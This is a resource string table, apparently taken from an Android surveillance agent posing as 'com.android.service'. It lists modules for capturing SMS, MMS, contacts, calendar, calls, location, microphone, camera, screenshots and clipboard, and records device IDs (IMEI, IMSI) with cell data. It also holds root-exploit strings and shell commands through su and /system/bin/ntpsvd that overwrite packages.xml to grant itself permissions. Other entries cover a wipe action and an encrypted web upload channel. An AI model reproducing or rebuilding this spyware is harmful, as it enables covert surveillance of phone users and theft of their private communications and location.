S.1=uninstall
S.10=disable
S.11=synchronize
S.12=apn
S.13=execute
S.14=log
S.15=stop
S.2=sms
S.3=module
S.4=status
S.5=start
S.6=stop
S.7=event
S.8=status
S.9=enable
M.1=content://mms-sms
M.10=text
M.11=content://mms/part/
M.12=UTF-8
M.13=msg_id=
M.14=content://mms/{0}/addr
M.15=address
M.5=content://mms/part
M.7=ct
M.8=text/plain
M.9=_data
1.0=IMSI: 
1.1=SID: 
1.11=IMSI: 
1.13=Sms type: 
1.14= number: 
1.15= text: 
1.2=, NID: 
1.3=, BID: 
1.4=CC: 
1.5=, MNC: 
1.6=, LAC: 
1.7=, CID: 
1.8=Cell and GPS info not available
1.9=IMEI: 
2.0=package:com.android.service
3.0=User-Agent
3.1=Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522+ (KHTML, like Gecko) Safari/419.3
3.2=Content-Type
3.3=application/octet-stream
4.10=application/octet-stream
4.2=/wc12/webclient
4.3=content-type
4.4=set-cookie
4.5=content-length
4.6=application/octet-stream
4.7=User-Agent
4.8=Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522+ (KHTML, like Gecko) Safari/419.3
4.9=Content-Type
5.0=core-update
5.1=New configuration received
5.2=application/vnd.android.package-archive
6.0=<html>
6.1=SHA1PRNG
7.0=u
7.1=no notes
8.0=Crisis started
8.2=Crisis stopped
9.11=cpuTotal: 
9.13=cpuIdle: 
9.15=root: yes
9.16=root: no
9.17=-- PROPERTIES --
9.21=/proc/stat
9.22=Board: 
9.23=Brand: 
9.24=Device: 
9.25=Display: 
9.26=Model:
9.3=-- SYSTEM --
9.4=IMEI: 
9.6=IMSI: SIM not present
9.7=IMSI: 
9.9=cpuUsage: 
10.1=MMS Subject: 
10.2=local
10.4=Body: 
11.1=Desktop
11.2=/system/bin/ntpsvd fb
11.3=frame
12.0=LocationThread
13.0=content://mms/sent
13.1=content://mms/inbox
13.10=_id
13.11=content://mms
13.12=addr
13.13=insert-address-token
13.17=thread_id
13.2=address
13.3=contact_id
13.4=charset
13.5=type
13.6=137
13.8=sub
13.9=date
14.0=content://sms/inbox
14.1=content://sms/sent
14.10=status
14.11=type
14.12=reply_path_present
14.13=service_center
14.2=body
14.3=address
14.4=date
14.5=yields_id
14.6=thread_id
14.7=person
14.8=protocol
14.9=read
15.1=pdus
15.2=SMS from 
16.0=User Id: 
16.1=Complete Name: 
16.11=State: 
16.12=Country: 
16.13=City: 
16.14=Street: 
16.15=PO Box: 
16.16=Zip: 
16.17=Neighbor: 
16.18=Address Type: 
16.2=Nickname: 
16.20=IM: 
16.21=IM Type: 
16.23=Company Name: 
16.24=Company Title: 
16.25=Company Type: 
16.27=Website: 
16.3=UserNote: 
16.5=Phone: 
16.6=Phone Type: 
16.8=Email: 
16.9=Type: 
17.0=AES
17.1=AES/CBC/NoPadding
17.2=AES/CBC/PKCS5Padding
17.3=AES/CBC/PKCS5Padding
17.4=AES/CBC/PKCS5Padding
18.1=mail
18.2=enabled
18.3=filter
18.4=history
18.5=datefrom
18.6=dateto
18.7=sms
18.8=enabled
18.9=mms
19.0=SHA-1
20.0=9774d56d682e549c
20.1=DEMO
21.0=SHA-1
22.0=.mob
22.1=Z
22.2=Z*
22.3=pr_80
22.4=.dat
22.5=l_
22.6=0000
23.0=$DIR$
23.1=$USERPROFILE$
24.0=cdd/
24.1=msdd/
24.2=ldd/
24.5=/.LOST.FILES/
25.0=content://sms
26.0=pdus
27.0=com.android.service.app
28.0= incoming: 
28.1= ongoing: 
29.0=MCC: 
29.1= MNC: 
29.2= LAC: 
29.3= CID: 
29.4=SID: 
29.5= NID: 
29.6= BID: 
30.1=Started
30.2=Invalid new configuration, reverting
30.3=New configuration activated
30.4=Actual configuration corrupted
31.0=sdk
31.1=UNAVAILABLE
31.10=cdma or not?
31.11= info: 
31.4=N/A
31.6= Error: 
31.7=null cell
31.8=gprs or not?
31.9= info: 
32.0=None
32.1=Agent Created
32.10= vol
32.11= rt
32.12=Root exploit
32.13=exploit failed!
32.14= air
32.15=layout
32.16=android.permission.READ_SMS
32.17=com.android.service
32.18=/system/bin/ntpsvd fhc /data/system/packages.xml /data/data/com.android.service/files/packages.xml
32.19=/system/bin/ntpsvd pzm 666 /data/data/com.android.service/files/packages.xml
32.2=/system/bin/ntpsvd
32.20=/data/data/com.android.service/files/test
32.21=packages.xml
32.22=/data/data/com.android.service/files/packages.xml
32.23=perm.xml
32.24=/system/bin/ntpsvd qzx \"cat /data/data/com.android.service/files/layout > 
32.25=/system/bin/ntpsvd qzx \"cat /data/data/com.android.service/files/perm.xml > /data/system/packages.xml\"
32.26=/data/data/com.android.service/files/perm.xml
32.27=/data/data/com.android.service/files/layout
32.28=/system/bin/ntpsvd reb
32.29=/data/data/com.android.service/files/statusdb rt
32.3=Agent Destroyed
32.30=su
32.31=su -c /data/data/com.android.service/files/s
32.32=/system/bin/ntpsvd ru
32.4=errorlog
32.5=statuslog
32.6=statusdb
32.7=/system/bin/chmod 755 
32.8=/system/bin/chmod 755 
32.9=/system/bin/chmod 666 
33.0=getInt
33.1=getLong
33.2=getBoolean
33.3=set
33.4=/system/app/Settings.apk
34.0=UnicodeLittleUnmarked
35.0=qzx
35.1=/system/bin/sh
36.0=0xA83E0F44BD7A4D20
36.1=0x5A3D10448D7A912B
36.2=0x5A3D10448D7A912A
36.3=(onConfigurationChanged)
36.4=(onLowMemory)
36.5=(onRebind)
36.6=(onUnbind)
a.0=/system/bin/ntpsvd
a.1=quota
a.10=actions
a.11=globals
a.12=type
a.13=desc
a.14=subactions
a.15=action
a.16=type
a.17=event
a.18=module
a.2=min
a.3=max
a.4=wipe
a.5=type
a.6=migrated
a.7=version
a.8=modules
a.9=events
b.0=sms
b.1=addressbook
b.10=mic
b.11=camera
b.12=clipboard
b.13=crisis
b.14=application
b.2=calendar
b.3=calllist
b.4=call
b.5=device
b.6=position
b.7=snapshot
b.8=screenshot
b.9=messages
c.0=sms
c.1=addressbook
c.10=clipboard
c.11=crisis
c.12=application
c.13=call
c.2=calendar
c.3=calllist
c.4=device
c.5=position
c.6=screenshot
c.7=messages
c.8=mic
c.9=camera
d.0=RULE: 
d.1=\ \nRULE: 
d.10=dtend
d.11=rrule
d.12=allDay
d.13=eventLocation
d.14=description
d.15=calendar_id
d.16=_id ASC
d.17=/events
d.18=content://calendar
d.19=content://com.android.calendar
d.2=/calendars
d.3=_id
d.4=displayName
d.5=selected
d.6=ownerAccount
d.7=_id
d.8=title
d.9=dtstart
e.0=timer
e.1=loop
e.10=quota
e.11=sim
e.12=position gps
e.13=ac
e.14=battery
e.15=standby
e.2=startup
e.3=date
e.4=afterinst
e.5=sms
e.6=call
e.7=connection
e.8=process
e.9=position cell
